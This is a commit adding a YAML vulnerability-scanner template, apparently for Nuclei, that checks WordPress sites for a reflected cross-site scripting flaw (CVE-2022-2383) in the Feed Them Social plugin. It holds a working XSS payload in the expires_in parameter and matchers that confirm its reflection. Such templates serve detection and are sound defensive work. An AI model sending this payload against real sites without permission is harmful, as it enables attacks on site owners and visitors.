Create CVE-2022-2383.yaml

patch-1
Ritik Chaddha 2022-08-25 21:18:37 +05:30 committed by GitHub
parent aba551cd62
commit b1c9ed03d7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2022-2383
info:
name: Feed Them Social < 3.0.1 - Cross-Site Scripting
author: akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
- https://nvd.nist.gov/vuln/detail/CVE-2022-2383
classification:
cve-id: CVE-2022-2383
metadata:
verified: true
tags: xss,wp,wordpress,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(document.domain)><br/>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200